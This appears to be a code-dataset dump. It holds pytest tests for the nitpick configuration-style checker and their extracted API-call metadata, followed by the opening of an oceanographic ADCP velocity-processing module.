NIP318 File pyproject.toml has missing values:{SUGGESTION_BEGIN}
[tool.black]
line-length = 100{SUGGESTION_END}
"""
).assert_errors_contain(
f"""
NIP319 File pyproject.toml has different values. Use this:{SUGGESTION_BEGIN}
[tool.black]
something = 11{SUGGESTION_END}
"""
).assert_errors_contain(
f"""
NIP321 File {SETUP_CFG} was not found. Create it with this content:{SUGGESTION_BEGIN}
[flake8]
inline-quotes = double
something = 123
[isort]
known_first_party = tests
line_length = 120
xxx = yyy{SUGGESTION_END}
"""
).cli_ls(
f"""
{PYPROJECT_TOML}
{SETUP_CFG}
"""
)
@pytest.mark.parametrize("offline", [False, True])
def test_include_styles_overriding_values(offline, tmp_path):
"""One style file can include another (also recursively). Ignore styles that were already included."""
ProjectMock(tmp_path).named_style(
"isort1",
f"""
[nitpick.styles]
include = "styles/isort2.toml"
["{SETUP_CFG}".isort]
line_length = 80
known_first_party = "tests"
xxx = "aaa"
""",
).named_style(
"styles/isort2",
f"""
[nitpick.styles]
include = ["styles/isort2.toml", "flake8.toml"]
["{SETUP_CFG}".isort]
line_length = 120
xxx = "yyy"
""",
).named_style(
"flake8",
f"""
[nitpick.styles]
include = ["black.toml"]
["{SETUP_CFG}".flake8]
inline-quotes = "double"
something = 123
""",
).named_style(
"black",
"""
[nitpick.styles]
include = ["styles/isort2.toml", "isort1.toml"]
["pyproject.toml".tool.black]
line-length = 100
""",
).pyproject_toml(
"""
[tool.nitpick]
style = "isort1"
"""
).flake8(
offline=offline
).assert_errors_contain(
f"""
NIP318 File pyproject.toml has missing values:{SUGGESTION_BEGIN}
[tool.black]
line-length = 100{SUGGESTION_END}
"""
).assert_errors_contain(
f"""
NIP321 File {SETUP_CFG} was not found. Create it with this content:{SUGGESTION_BEGIN}
[flake8]
inline-quotes = double
something = 123
[isort]
known_first_party = tests
line_length = 120
xxx = yyy{SUGGESTION_END}
"""
)
@pytest.mark.parametrize("offline", [False, True])
@mock.patch("nitpick.flake8.NitpickFlake8Extension.version", new_callable=PropertyMock(return_value="0.5.3"))
def test_minimum_version(mocked_version, offline, tmp_path):
"""Stamp a style file with a minimum required version, to indicate new features or breaking changes."""
assert_conditions(mocked_version == "0.5.3")
ProjectMock(tmp_path).named_style(
"parent",
"""
[nitpick.styles]
include = "child.toml"
["pyproject.toml".tool.black]
line-length = 100
""",
).named_style(
"child",
"""
[nitpick]
minimum_version = "1.0"
""",
).pyproject_toml(
"""
[tool.nitpick]
style = "parent"
[tool.black]
line-length = 100
"""
).flake8(
offline=offline
).assert_single_error(
"NIP203 The style file you're using requires nitpick>=1.0 (you have 0.5.3). Please upgrade"
)
@pytest.mark.parametrize("offline", [False, True])
@XFAIL_ON_WINDOWS
def test_relative_and_other_root_dirs(offline, tmp_path):
"""Test styles in relative and in other root dirs."""
another_dir: Path = tmp_path / "another_dir"
project = (
ProjectMock(tmp_path)
.named_style(
f"{another_dir}/main",
"""
[nitpick.styles]
include = "styles/pytest.toml"
""",
)
.named_style(
f"{another_dir}/styles/pytest",
"""
["pyproject.toml".tool.pytest]
some-option = 123
""",
)
.named_style(
f"{another_dir}/styles/black",
"""
["pyproject.toml".tool.black]
line-length = 99
missing = "value"
""",
)
.named_style(
f"{another_dir}/poetry",
"""
["pyproject.toml".tool.poetry]
version = "1.0"
""",
)
)
common_pyproject = """
[tool.black]
line-length = 99
[tool.pytest]
some-option = 123
"""
# Use full path on initial styles
project.pyproject_toml(
f"""
[tool.nitpick]
style = ["{another_dir}/main", "{another_dir}/styles/black"]
{common_pyproject}
"""
).flake8(offline=offline).assert_single_error(
f"""
NIP318 File pyproject.toml has missing values:{SUGGESTION_BEGIN}
[tool.black]
missing = "value"{SUGGESTION_END}
"""
)
# Reuse the first full path that appears
project.pyproject_toml(
f"""
[tool.nitpick]
style = ["{another_dir}/main", "styles/black.toml"]
{common_pyproject}
"""
).api_check().assert_violations(
Fuss(
False,
PYPROJECT_TOML,
318,
" has missing values:",
"""
[tool.black]
missing = "value"
""",
)
)
# Allow relative paths
project.pyproject_toml(
f"""
[tool.nitpick]
style = ["{another_dir}/styles/black", "../poetry"]
{common_pyproject}
"""
).flake8(offline=offline).assert_single_error(
f"""
NIP318 File pyproject.toml has missing values:{SUGGESTION_BEGIN}
[tool.black]
missing = "value"
[tool.poetry]
version = "1.0"{SUGGESTION_END}
"""
)
@pytest.mark.parametrize("offline", [False, True])
def test_symlink_subdir(offline, tmp_path):
"""Test relative styles in subdirectories of a symlink dir."""
target_dir: Path = tmp_path / "target_dir"
ProjectMock(tmp_path).named_style(
f"{target_dir}/parent",
"""
[nitpick.styles]
include = "styles/child.toml"
""",
).named_style(
f"{target_dir}/styles/child",
"""
["pyproject.toml".tool.black]
line-length = 86
""",
).create_symlink(
"symlinked-style.toml", target_dir, "parent.toml"
).pyproject_toml(
"""
[tool.nitpick]
style = "symlinked-style"
"""
).flake8(
offline=offline
).assert_single_error(
f"""
NIP318 File pyproject.toml has missing values:{SUGGESTION_BEGIN}
[tool.black]
line-length = 86{SUGGESTION_END}
"""
)
@responses.activate
def test_relative_style_on_urls(tmp_path):
"""Read styles from relative paths on URLs."""
base_url = "http://www.example.com/sub/folder"
mapping = {
"main": """
[nitpick.styles]
include = "styles/pytest.toml"
""",
"styles/pytest": """
["pyproject.toml".tool.pytest]
some-option = 123
""",
"styles/black": """
["pyproject.toml".tool.black]
line-length = 99
missing = "value"
""",
"poetry": """
["pyproject.toml".tool.poetry]
version = "1.0"
""",
}
for filename, body in mapping.items():
responses.add(responses.GET, f"{base_url}/{filename}.toml", dedent(body), status=200)
project = ProjectMock(tmp_path)
common_pyproject = """
[tool.black]
line-length = 99
[tool.pytest]
some-option = 123
"""
# Use full path on initial styles
project.pyproject_toml(
f"""
[tool.nitpick]
style = ["{base_url}/main", "{base_url}/styles/black.toml"]
{common_pyproject}
"""
).api_check().assert_violations(
Fuss(
False,
PYPROJECT_TOML,
318,
" has missing values:",
"""
[tool.black]
missing = "value"
""",
)
)
# Reuse the first full path that appears
project.pyproject_toml(
f"""
[tool.nitpick]
style = ["{base_url}/main.toml", "styles/black"]
{common_pyproject}
"""
).api_check().assert_violations(
Fuss(
False,
PYPROJECT_TOML,
318,
" has missing values:",
"""
[tool.black]
missing = "value"
""",
)
)
# Allow relative paths
project.pyproject_toml(
f"""
[tool.nitpick]
style = ["{base_url}/styles/black.toml", "../poetry"]
{common_pyproject}
"""
).api_check().assert_violations(
Fuss(
False,
PYPROJECT_TOML,
318,
" has missing values:",
"""
[tool.black]
missing = "value"
[tool.poetry]
version = "1.0"
""",
)
)
@responses.activate
@XFAIL_ON_WINDOWS
def test_local_style_should_override_settings(tmp_path):
"""Don't build relative URLs from local file names (starting with "./")."""
remote_url = "https://example.com/remote-style.toml"
remote_style = """
["pyproject.toml".tool.black]
line-length = 100
"""
responses.add(responses.GET, remote_url, dedent(remote_style), status=200)
local_file = "local-file.toml"
local_style = """
["pyproject.toml".tool.black]
line-length = 120
"""
ProjectMock(tmp_path).pyproject_toml(
f"""
[tool.nitpick]
style = [
"{remote_url}",
"{DOT_SLASH}{local_file}",
]
[tool.black]
line-length = 80
"""
).named_style(local_file, local_style).api_check().assert_violations(
Fuss(
False,
PYPROJECT_TOML,
319,
" has different values. Use this:",
"""
[tool.black]
line-length = 120
""",
)
)
@responses.activate
def test_fetch_private_github_urls(tmp_path):
"""Fetch private GitHub URLs with a token on the query string."""
base_url = "https://raw.githubusercontent.com/user/private_repo/branch/path/to/nitpick-style"
query_string = "?token=xxx"
full_private_url = f"{base_url}{TOML_EXTENSION}{query_string}"
body = """
["pyproject.toml".tool.black]
missing = "thing"
"""
responses.add(responses.GET, full_private_url, dedent(body), status=200)
project = ProjectMock(tmp_path).pyproject_toml(
f"""
[tool.nitpick]
style = "{base_url}{query_string}"
"""
)
project.flake8(offline=False).assert_single_error(
f"""
NIP318 File pyproject.toml has missing values:{SUGGESTION_BEGIN}
[tool.black]
missing = "thing"{SUGGESTION_END}
"""
)
project.flake8(offline=True).assert_no_errors()
@responses.activate
def test_include_remote_style_from_local_style(tmp_path):
"""Test include of remote style when there is only a local style."""
remote_style = "https://raw.githubusercontent.com/user/repo/branch/path/to/nitpick-style"
url_with_extension = f"{remote_style}{TOML_EXTENSION}"
body = """
["tox.ini".section]
key = "value"
"""
responses.add(responses.GET, url_with_extension, dedent(body), status=200)
project = ProjectMock(tmp_path).style(
f"""
[nitpick.styles]
include = [
"{remote_style}"
]
"""
)
project.assert_file_contents(TOX_INI, None).api_check_then_fix(
Fuss(True, TOX_INI, 321, " was not found. Create it with this content:", "[section]\nkey = value")
).assert_file_contents(
TOX_INI,
"""
[section]
key = value
""",
PYPROJECT_TOML,
None,
)
@pytest.mark.parametrize("offline", [False, True])
def test_merge_styles_into_single_file(offline, tmp_path):
"""Merge all styles into a single TOML file on the cache dir. Also test merging lists (pre-commit repos)."""
ProjectMock(tmp_path).named_style(
"black",
'''
["pyproject.toml".tool.black]
line-length = 120
[[".pre-commit-config.yaml".repos]]
yaml = """
- repo: https://github.com/psf/black
rev: 21.5b2
hooks:
- id: black
args: [--safe, --quiet]
- repo: https://github.com/asottile/blacken-docs
rev: v1.10.0
hooks:
- id: blacken-docs
additional_dependencies: [black==21.5b2]
"""
# TODO The toml library has issues loading arrays with multiline strings:
# https://github.com/uiri/toml/issues/123
# https://github.com/uiri/toml/issues/230
# If they are fixed one day, remove this 'yaml' key and use only a 'repos' list with a single element:
#[".pre-commit-config.yaml"]
#repos = ["""
#<YAML goes here>
#"""]
''',
).named_style(
"isort",
'''
["setup.cfg".isort]
line_length = 120
skip = ".tox,build"
known_first_party = "tests"
# The configuration below is needed for compatibility with black.
# https://github.com/python/black#how-black-wraps-lines
# https://github.com/PyCQA/isort#multi-line-output-modes
multi_line_output = 3
include_trailing_comma = true
force_grid_wrap = 0
combine_as_imports = true
[[".pre-commit-config.yaml".repos]]
yaml = """
- repo: https://github.com/PyCQA/isort
rev: 5.8.0
hooks:
- id: isort
"""
''',
).named_style(
"isort_overrides",
f"""
["{SETUP_CFG}".isort]
another_key = "some value"
multi_line_output = 6
""",
).pyproject_toml(
"""
[tool.nitpick]
style = ["black", "isort", "isort_overrides"]
"""
).flake8(
offline=offline
).assert_merged_style(
f'''
["pyproject.toml".tool.black]
line-length = 120
["{SETUP_CFG}".isort]
line_length = 120
skip = ".tox,build"
known_first_party = "tests"
# The configuration below is needed for compatibility with black.
# https://github.com/python/black#how-black-wraps-lines
# https://github.com/PyCQA/isort#multi-line-output-modes
multi_line_output = 6
include_trailing_comma = true
force_grid_wrap = 0
combine_as_imports = true
another_key = "some value"
[[".pre-commit-config.yaml".repos]]
yaml = """
- repo: https://github.com/psf/black
rev: 21.5b2
hooks:
- id: black
args: [--safe, --quiet]
- repo: https://github.com/asottile/blacken-docs
rev: v1.10.0
hooks:
- id: blacken-docs
additional_dependencies: [black==21.5b2]
"""
[[".pre-commit-config.yaml".repos]]
yaml = """
- repo: https://github.com/PyCQA/isort
rev: 5.8.0
hooks:
- id: isort
"""
'''
)
@pytest.mark.parametrize("offline", [False, True])
def test_invalid_tool_nitpick_on_pyproject_toml(offline, tmp_path):
"""Test invalid [tool.nitpick] on pyproject.toml."""
project = ProjectMock(tmp_path)
for style, error_message in [
(
'style = [""]\nextra_values = "also raise warnings"',
f"extra_values: Unknown configuration. See {READ_THE_DOCS_URL}configuration.html."
+ "\nstyle.0: Shorter than minimum length 1.",
),
('style = ""', "style: Shorter than minimum length 1."),
("style = 1", "style: Not a valid string."),
(
'style = ["some_file",""," "]',
"style.1: Shorter than minimum length 1.\nstyle.2: Shorter than minimum length 1.",
),
]:
project.pyproject_toml(f"[tool.nitpick]\n{style}").flake8(offline=offline).assert_errors_contain(
"NIP001 File pyproject.toml has an incorrect style."
+ f" Invalid data in [tool.nitpick]:{SUGGESTION_BEGIN}\n{error_message}{SUGGESTION_END}",
1,
)
def test_invalid_toml(tmp_path):
"""Invalid TOML should emit a NIP warning, not raise TomlDecodeError."""
ProjectMock(tmp_path).style(
f"""
["{SETUP_CFG}".flake8]
ignore = D100,D104,D202,E203,W503
"""
).api_check_then_fix(
Fuss(
False,
"nitpick-style.toml",
1,
" has an incorrect style. Invalid TOML"
" (toml.decoder.TomlDecodeError: This float doesn't have a leading digit (line 2 column 1 char 21))",
)
)
@pytest.mark.parametrize("offline", [False, True])
def test_invalid_nitpick_files(offline, tmp_path):
"""Invalid [nitpick.files] section."""
ProjectMock(tmp_path).named_style(
"some_style",
"""
[xxx]
wrong = "section"
""",
).named_style(
"wrong_files",
"""
[nitpick.files.whatever]
wrong = "section"
""",
).pyproject_toml(
"""
[tool.nitpick]
style = ["some_style", "wrong_files"]
"""
).flake8(
offline=offline
).assert_errors_contain(
f"""
NIP001 File some_style.toml has an incorrect style. Invalid config:{SUGGESTION_BEGIN}
xxx: Unknown file. See {READ_THE_DOCS_URL}plugins.html.{SUGGESTION_END}
"""
).assert_errors_contain(
f"""
NIP001 File wrong_files.toml has an incorrect style. Invalid config:{SUGGESTION_BEGIN}
nitpick.files.whatever: Unknown file. See {READ_THE_DOCS_URL}nitpick_section.html#nitpick-files.{SUGGESTION_END}
""",
2,
)
@responses.activate
def test_github_fetch(tmp_path):
"""Test that gh:// and github:// URLs can be fetched."""
raw_url = "https://raw.githubusercontent.com/andreoliwa/nitpick/develop"
data = [
(
f"{raw_url}/initial.toml",
"""
[nitpick.styles]
include = "black.toml"
""",
),
(
f"{raw_url}/black.toml",
"""
["pyproject.toml".tool.black]
line-length = 120
""",
),
]
for url, style in data:
responses.add(responses.GET, url, dedent(style), status=200)
responses.add(responses.GET, "https://api.github.com/repos/andreoliwa/nitpick", """{"default_branch": "develop"}""")
ProjectMock(tmp_path).pyproject_toml(
"""
[tool.nitpick]
style = [
"github://andreoliwa/nitpick/initial.toml",
]
"""
).api_check().assert_violations(
Fuss(
False,
PYPROJECT_TOML,
318,
" has missing values:",
"""
[tool.black]
line-length = 120
""",
)
)
|
[
"textwrap.dedent",
"nitpick.violations.Fuss",
"unittest.mock.PropertyMock",
"tests.helpers.assert_conditions",
"responses.add",
"pytest.mark.parametrize",
"tests.helpers.ProjectMock"
] |
[((513, 562), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""offline"""', '[False, True]'], {}), "('offline', [False, True])\n", (536, 562), False, 'import pytest\n'), ((2396, 2445), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""offline"""', '[False, True]'], {}), "('offline', [False, True])\n", (2419, 2445), False, 'import pytest\n'), ((4177, 4226), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""offline"""', '[False, True]'], {}), "('offline', [False, True])\n", (4200, 4226), False, 'import pytest\n'), ((5183, 5232), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""offline"""', '[False, True]'], {}), "('offline', [False, True])\n", (5206, 5232), False, 'import pytest\n'), ((7686, 7735), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""offline"""', '[False, True]'], {}), "('offline', [False, True])\n", (7709, 7735), False, 'import pytest\n'), ((13962, 14011), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""offline"""', '[False, True]'], {}), "('offline', [False, True])\n", (13985, 14011), False, 'import pytest\n'), ((17416, 17465), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""offline"""', '[False, True]'], {}), "('offline', [False, True])\n", (17439, 17465), False, 'import pytest\n'), ((19024, 19073), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""offline"""', '[False, True]'], {}), "('offline', [False, True])\n", (19047, 19073), False, 'import pytest\n'), ((4510, 4554), 'tests.helpers.assert_conditions', 'assert_conditions', (["(mocked_version == '0.5.3')"], {}), "(mocked_version == '0.5.3')\n", (4527, 4554), False, 'from tests.helpers import SUGGESTION_BEGIN, SUGGESTION_END, XFAIL_ON_WINDOWS, ProjectMock, assert_conditions\n'), ((9437, 9458), 'tests.helpers.ProjectMock', 'ProjectMock', (['tmp_path'], {}), '(tmp_path)\n', (9448, 9458), False, 'from tests.helpers import SUGGESTION_BEGIN, SUGGESTION_END, XFAIL_ON_WINDOWS, ProjectMock, assert_conditions\n'), ((17605, 17626), 'tests.helpers.ProjectMock', 'ProjectMock', (['tmp_path'], {}), '(tmp_path)\n', (17616, 17626), False, 'from tests.helpers import SUGGESTION_BEGIN, SUGGESTION_END, XFAIL_ON_WINDOWS, ProjectMock, assert_conditions\n'), ((20723, 20843), 'responses.add', 'responses.add', (['responses.GET', '"""https://api.github.com/repos/andreoliwa/nitpick"""', '"""{"default_branch": "develop"}"""'], {}), '(responses.GET,\n \'https://api.github.com/repos/andreoliwa/nitpick\',\n \'{"default_branch": "develop"}\')\n', (20736, 20843), False, 'import responses\n'), ((4301, 4335), 'unittest.mock.PropertyMock', 'PropertyMock', ([], {'return_value': '"""0.5.3"""'}), "(return_value='0.5.3')\n", (4313, 4335), False, 'from unittest.mock import PropertyMock\n'), ((7017, 7153), 'nitpick.violations.Fuss', 'Fuss', (['(False)', 'PYPROJECT_TOML', '(318)', '""" has missing values:"""', '"""\n [tool.black]\n missing = "value"\n """'], {}), '(False, PYPROJECT_TOML, 318, \' has missing values:\',\n """\n [tool.black]\n missing = "value"\n """)\n', (7021, 7153), False, 'from nitpick.violations import Fuss\n'), ((9843, 9979), 'nitpick.violations.Fuss', 'Fuss', (['(False)', 'PYPROJECT_TOML', '(318)', '""" has missing values:"""', '"""\n [tool.black]\n missing = "value"\n """'], {}), '(False, PYPROJECT_TOML, 318, \' has missing values:\',\n """\n [tool.black]\n missing = "value"\n """)\n', (9847, 9979), False, 'from nitpick.violations import Fuss\n'), ((10304, 10440), 'nitpick.violations.Fuss', 'Fuss', (['(False)', 'PYPROJECT_TOML', '(318)', '""" has missing values:"""', '"""\n [tool.black]\n missing = "value"\n """'], {}), '(False, PYPROJECT_TOML, 318, \' has missing values:\',\n """\n [tool.black]\n missing = "value"\n """)\n', (10308, 10440), False, 'from nitpick.violations import Fuss\n'), ((10752, 10948), 'nitpick.violations.Fuss', 'Fuss', (['(False)', 'PYPROJECT_TOML', '(318)', '""" has missing values:"""', '"""\n [tool.black]\n missing = "value"\n\n [tool.poetry]\n version = "1.0"\n """'], {}), '(False, PYPROJECT_TOML, 318, \' has missing values:\',\n """\n [tool.black]\n missing = "value"\n\n [tool.poetry]\n version = "1.0"\n """\n )\n', (10756, 10948), False, 'from nitpick.violations import Fuss\n'), ((11391, 11411), 'textwrap.dedent', 'dedent', (['remote_style'], {}), '(remote_style)\n', (11397, 11411), False, 'from textwrap import dedent\n'), ((11866, 12014), 'nitpick.violations.Fuss', 'Fuss', (['(False)', 'PYPROJECT_TOML', '(319)', '""" has different values. Use this:"""', '"""\n [tool.black]\n line-length = 120\n """'], {}), '(False, PYPROJECT_TOML, 319, \' has different values. Use this:\',\n """\n [tool.black]\n line-length = 120\n """)\n', (11870, 12014), False, 'from nitpick.violations import Fuss\n'), ((12565, 12577), 'textwrap.dedent', 'dedent', (['body'], {}), '(body)\n', (12571, 12577), False, 'from textwrap import dedent\n'), ((13447, 13459), 'textwrap.dedent', 'dedent', (['body'], {}), '(body)\n', (13453, 13459), False, 'from textwrap import dedent\n'), ((18765, 18949), 'nitpick.violations.Fuss', 'Fuss', (['(False)', '"""nitpick-style.toml"""', '(1)', '""" has an incorrect style. Invalid TOML (toml.decoder.TomlDecodeError: This float doesn\'t have a leading digit (line 2 column 1 char 21))"""'], {}), '(False, \'nitpick-style.toml\', 1,\n " has an incorrect style. Invalid TOML (toml.decoder.TomlDecodeError: This float doesn\'t have a leading digit (line 2 column 1 char 21))"\n )\n', (18769, 18949), False, 'from nitpick.violations import Fuss\n'), ((21057, 21193), 'nitpick.violations.Fuss', 'Fuss', (['(False)', 'PYPROJECT_TOML', '(318)', '""" has missing values:"""', '"""\n [tool.black]\n line-length = 120\n """'], {}), '(False, PYPROJECT_TOML, 318, \' has missing values:\',\n """\n [tool.black]\n line-length = 120\n """)\n', (21061, 21193), False, 'from nitpick.violations import Fuss\n'), ((9396, 9408), 'textwrap.dedent', 'dedent', (['body'], {}), '(body)\n', (9402, 9408), False, 'from textwrap import dedent\n'), ((12606, 12627), 'tests.helpers.ProjectMock', 'ProjectMock', (['tmp_path'], {}), '(tmp_path)\n', (12617, 12627), False, 'from tests.helpers import SUGGESTION_BEGIN, SUGGESTION_END, XFAIL_ON_WINDOWS, ProjectMock, assert_conditions\n'), ((13488, 13509), 'tests.helpers.ProjectMock', 'ProjectMock', (['tmp_path'], {}), '(tmp_path)\n', (13499, 13509), False, 'from tests.helpers import SUGGESTION_BEGIN, SUGGESTION_END, XFAIL_ON_WINDOWS, ProjectMock, assert_conditions\n'), ((20691, 20704), 'textwrap.dedent', 'dedent', (['style'], {}), '(style)\n', (20697, 20704), False, 'from textwrap import dedent\n'), ((13708, 13813), 'nitpick.violations.Fuss', 'Fuss', (['(True)', 'TOX_INI', '(321)', '""" was not found. Create it with this content:"""', '"""[section]\nkey = value"""'], {}), '(True, TOX_INI, 321, \' was not found. Create it with this content:\',\n """[section]\nkey = value""")\n', (13712, 13813), False, 'from nitpick.violations import Fuss\n'), ((18604, 18625), 'tests.helpers.ProjectMock', 'ProjectMock', (['tmp_path'], {}), '(tmp_path)\n', (18615, 18625), False, 'from tests.helpers import SUGGESTION_BEGIN, SUGGESTION_END, XFAIL_ON_WINDOWS, ProjectMock, assert_conditions\n'), ((20845, 20866), 'tests.helpers.ProjectMock', 'ProjectMock', (['tmp_path'], {}), '(tmp_path)\n', (20856, 20866), False, 'from tests.helpers import SUGGESTION_BEGIN, SUGGESTION_END, XFAIL_ON_WINDOWS, ProjectMock, assert_conditions\n'), ((5440, 5461), 'tests.helpers.ProjectMock', 'ProjectMock', (['tmp_path'], {}), '(tmp_path)\n', (5451, 5461), False, 'from tests.helpers import SUGGESTION_BEGIN, SUGGESTION_END, XFAIL_ON_WINDOWS, ProjectMock, assert_conditions\n'), ((11560, 11581), 'tests.helpers.ProjectMock', 'ProjectMock', (['tmp_path'], {}), '(tmp_path)\n', (11571, 11581), False, 'from tests.helpers import SUGGESTION_BEGIN, SUGGESTION_END, XFAIL_ON_WINDOWS, ProjectMock, assert_conditions\n'), ((4559, 4580), 'tests.helpers.ProjectMock', 'ProjectMock', (['tmp_path'], {}), '(tmp_path)\n', (4570, 4580), False, 'from tests.helpers import SUGGESTION_BEGIN, SUGGESTION_END, XFAIL_ON_WINDOWS, ProjectMock, assert_conditions\n'), ((7898, 7919), 'tests.helpers.ProjectMock', 'ProjectMock', (['tmp_path'], {}), '(tmp_path)\n', (7909, 7919), False, 'from tests.helpers import SUGGESTION_BEGIN, SUGGESTION_END, XFAIL_ON_WINDOWS, ProjectMock, assert_conditions\n'), ((14188, 14209), 'tests.helpers.ProjectMock', 'ProjectMock', (['tmp_path'], {}), '(tmp_path)\n', (14199, 14209), False, 'from tests.helpers import SUGGESTION_BEGIN, SUGGESTION_END, XFAIL_ON_WINDOWS, ProjectMock, assert_conditions\n'), ((19172, 19193), 'tests.helpers.ProjectMock', 'ProjectMock', (['tmp_path'], {}), '(tmp_path)\n', (19183, 19193), False, 'from tests.helpers import SUGGESTION_BEGIN, SUGGESTION_END, XFAIL_ON_WINDOWS, ProjectMock, assert_conditions\n'), ((2619, 2640), 'tests.helpers.ProjectMock', 'ProjectMock', (['tmp_path'], {}), '(tmp_path)\n', (2630, 2640), False, 'from tests.helpers import SUGGESTION_BEGIN, SUGGESTION_END, XFAIL_ON_WINDOWS, ProjectMock, assert_conditions\n'), ((729, 750), 'tests.helpers.ProjectMock', 'ProjectMock', (['tmp_path'], {}), '(tmp_path)\n', (740, 750), False, 'from tests.helpers import SUGGESTION_BEGIN, SUGGESTION_END, XFAIL_ON_WINDOWS, ProjectMock, assert_conditions\n')]
|
#!/usr/bin/env python
"""
@package ion_functions.data.adcp_functions
@file ion_functions/data/adcp_functions.py
@author <NAME>, <NAME>, <NAME>
@brief Module containing ADCP related data-calculations.
"""
import numpy as np
from ion_functions.data.generic_functions import magnetic_declination
from ion_functions.data.generic_functions import replace_fill_with_nan
# instrument fill value unprocessed by CI
# (bad beam velocity sentinel output by tRDI ADCP instruments)
ADCP_FILLVALUE = -32768
"""
**** For instruments programmed in beam coordinates:
(ADCPS-I,K; ADCPT-B,D,E)
adcp_beam_eastward -- calculates VELPROF-VLE_L1
adcp_beam_northward -- calculates VELPROF-VLN_L1
adcp_beam_vertical -- calculates VELPROF-VLU_L1
adcp_beam_error -- calculates VELPROF-ERR_L1
**** For instruments programmed in earth coordinates:
(ADCPA; ADCPS-J,L,N; ADCPT-C,F,G,M)
adcp_earth_eastward -- calculates VELPROF-VLE_L1
adcp_earth_northward -- calculates VELPROF-VLN_L1
adcp_earth_vertical -- calculates VELPROF-VLU_L1
adcp_earth_error -- calculates VELPROF-ERR_L1
**** For the VADCP programmed in beam coordinates:
vadcp_beam_eastward -- calculates VELTURB-VLE_L1
vadcp_beam_northward -- calculates VELTURB-VLN_L1
vadcp_beam_vertical_true -- calculates VELTURB-VLU-5BM_L1
vadcp_beam_vertical_est -- calculates VELTURB-VLU-4BM_L1
vadcp_beam_error -- calculates VELTURB-ERR_L1
**** For all tRDI ADCP instruments:
adcp_backscatter -- calculates ECHOINT-B1_L1,
calculates ECHOINT-B2_L1,
calculates ECHOINT-B3_L1,
calculates ECHOINT-B4_L1.
**** Base functions used by above functions
adcp_beam2ins -- applies the beam to instrument transform using a 4
beam solution for instruments programmed in beam coordinates
adcp_ins2earth -- applies the instrument to Earth transform for all
instruments originally programmed in beam coordinates.
magnetic_correction -- corrects horizontal velocities for the magnetic
variation (declination) at the measurement location.
**** Supplementary functions to calculate velocity bin depths:
adcp_bin_depths -- calculates bin depths for the pd0 output format
(virtually all tRDI ADCPs deployed by OOI); uses
TEOS-10 functions p_from_z and enthalpy_SSO_0_p.
adcp_bin_depths_pd8 -- calculates bin depths for the pd8 output format,
assuming that (1) the ADCP operator recorded the
necessary input variables and (2) these are somehow
entered into the CI system.
"""
# Wrapper functions to create the VELPROF L1 data products for instruments
# programmed in beam coordinates by RSN (ADCPS-I,K and ADCPT-B,D,E)
def adcp_beam_eastward(b1, b2, b3, b4, h, p, r, vf, lat, lon, z, dt):
"""
Description:
Wrapper function to compute the Eastward Velocity Profile (VELPROF-VLE)
from beam coordinate transformed velocity profiles as defined in the
Data Product Specification for Velocity Profile and Echo Intensity -
DCN 1341-00750.
Implemented by:
2013-04-10: <NAME>. Initial code.
2014-02-03: <NAME>. Formatting and adjusting to use
magnetic declination values calculated use the WMM 2010.
2014-04-04: <NAME>. Optimized code performance by replacing
the for loops previously used to calculate 2D and 3D
vectorized coordinate transformations with calls to
np.einsum (numpy Einstein summation function).
2014-06-25: <NAME>. Edited to account for units of
heading, pitch, roll and depth
2015-06-10: <NAME>.
(a) moved the conditioning of input beam velocities to adcp_beam2inst.
(b) moved the conditioning of compass readings to adcp_inst2earth.
(c) removed the depth dependence from the magnetic declination.
Usage:
uu_cor = adcp_beam_eastward(b1, b2, b3, b4, h, p, r, vf, lat, lon, z, dt)
where
uu_corr = east velocity profiles in Earth coordinates corrected for the
magnetic declination (VELPROF-VLE_L1) [m s-1]
b1 = "beam 1" velocity profiles in beam coordinates (VELPROF-B1_L0) [mm s-1]
b2 = "beam 2" velocity profiles in beam coordinates (VELPROF-B2_L0) [mm s-1]
b3 = "beam 3" velocity profiles in beam coordinates (VELPROF-B3_L0) [mm s-1]
b4 = "beam 4" velocity profiles in beam coordinates (VELPROF-B4_L0) [mm s-1]
h = instrument's uncorrected magnetic heading [cdegrees]
p = instrument pitch [cdegrees]
r = instrument roll [cdegrees]
vf = instrument's vertical orientation (0 = downward looking and
1 = upward looking)
lat = instrument's deployment latitude [decimal degrees]
lon = instrument's deployment longitude [decimal degrees]
z = instrument's pressure sensor reading (depth) [daPa]
dt = sample date and time value [seconds since 1900-01-01]
"""
# force shapes of inputs to arrays of the correct dimensions
#z = np.atleast_1d(z) / 1000. # scale daPa depth input to dbar
#z = z * 1.019716 # use a simple approximation to calculate depth in m
lat = np.atleast_1d(lat)
lon = np.atleast_1d(lon)
dt = np.atleast_1d(dt)
# compute the beam to instrument transform
u, v, w, eee = adcp_beam2ins(b1, b2, b3, b4)
#print eee
# compute the instrument to earth beam transform
uu, vv, _ = adcp_ins2earth(u, v, w, h, p, r, vf)
# compute the magnetic variation, and ...
theta = magnetic_declination(lat, lon, dt)
# ... correct for it
uu_cor, _ = magnetic_correction(theta, uu, vv)
# scale velocity to m/s
uu_cor = uu_cor / 1000. # mm/s -> m/s
# return the Eastward Velocity Profile
return uu_cor
def adcp_beam_northward(b1, b2, b3, b4, h, p, r, vf, lat, lon, z, dt):
"""
Description:
Wrapper function to compute the Northward Velocity Profile (VELPROF-VLN)
from beam coordinate transformed velocity profiles as defined in the
Data Product Specification for Velocity Profile and Echo Intensity -
DCN 1341-00750.
Implemented by:
2013-04-10: <NAME>. Initial code.
2014-02-03: <NAME>. Formatting and adjusting to use
magnetic declination values calculated use the WMM 2010.
2014-03-28: <NAME>iderio. Corrected documentation only.
2014-04-04: <NAME>. Optimized code performance by replacing
the for loops previously used to calculate 2D and 3D
vectorized coordinate transformations with calls to
np.einsum (numpy Einstein summation function).
2014-06-25: Christopher Wingard. Edited to account for units of
heading, pitch, roll and depth
2015-06-10: <NAME>.
(a) moved the conditioning of input beam velocities to adcp_beam2inst.
(b) moved the conditioning of compass readings to adcp_inst2earth.
(c) removed the depth dependence from the magnetic declination.
Usage:
vv_cor = adcp_beam_northward(b1, b2, b3, b4, h, p, r, vf, lat, lon, z, dt)
where
vv_corr = north velocity profiles in Earth coordinates corrected for the
magnetic declination (VELPROF-VLN_L1) [m s-1]
